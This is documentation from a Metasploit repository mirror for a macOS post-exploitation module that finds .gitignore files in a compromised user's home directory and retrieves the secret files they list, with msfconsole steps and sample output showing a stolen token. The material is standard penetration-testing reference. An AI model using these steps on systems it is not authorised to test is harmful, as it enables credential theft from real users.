adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/post/osx/gather/gitignore.md
T
h00die 557a15a115 spelling fixes on docs
2023-10-10 14:46:18 -04:00

78 lines
2.2 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module finds and retrieves gitignore files from the user's home directory,
as well as retrieves the contents of files found in the gitignore.
## Verification Steps
1. Start msfconsole
2. Get at least a user shell
Locate gitignore files:
3. Do: `use post/osx/gather/gitignore`
4. Do: `set session #`
5. Do: `set mode 1`
5. Do: `run`
6. You should see a list of all gitignore files with absolute path located recursively from the users'r home directory
Retrieve gitignore files:
7. Do: `set mode 2`
8. Do: `set file /absolute/path/to/.gitignore`
9. Do `run`
10. You should see the contents of the gitignore file. If you see anything useful, you can also retrieve these artifacts.
Retrieve sensitive or interesting artifacts:
11. Do: `set file /absolute/path/to/sensitive_file`
12. Do: `run`
## Options
### MODE
Select between enumeration and retrieval mode.
Mode 1 is enumeration of all gitignore files recursively in the user's home directory.
Mode 2 is used for retrieving file contents should they be ASCII text.
### FILE
This is the absolute file path to the .gitignore and/or sensitive file you would like to retrieve.
## Scenarios
Gitignore files commonly list items developers don't want leaked and generally contain sensitive information.
### Finding gitignore files
```
msf6 post(osx/gather/gitignore) > set mode 1
msf6 post(osx/gather/gitignore) > set session 1
msf6 post(osx/gather/gitignore) > run
[*] Fetching .gitignore files
[+] /Users/victim/Documents/project/.gitignore
[+] ...
[*] Post module execution completed
```
### Recovering contents of a specific gitignore
```
msf6 post(osx/gather/gitignore) > set file /Users/victim/project/.gitignore
msf6 post(osx/gather/gitignore) > set mode 2
msf6 post(osx/gather/gitignore) > run
[+] /Users/victim/project/.gitignore
[+] .sensitive_file
[*] Post module execution completed
```
### Recovering contents of a sentitive file
```
msf6 post(osx/gather/gitignore) > set file /Users/victim/project/.sensitive_file
msf6 post(osx/gather/gitignore) > run
[+] /Users/victim/project/.sensitive_file
[+] PWNED_APPLICATION_TOKEN=cHduZWQgdXIgZ2l0aHVi
[*] Post module execution completed
```
Reference in New Issue View Git Blame Copy Permalink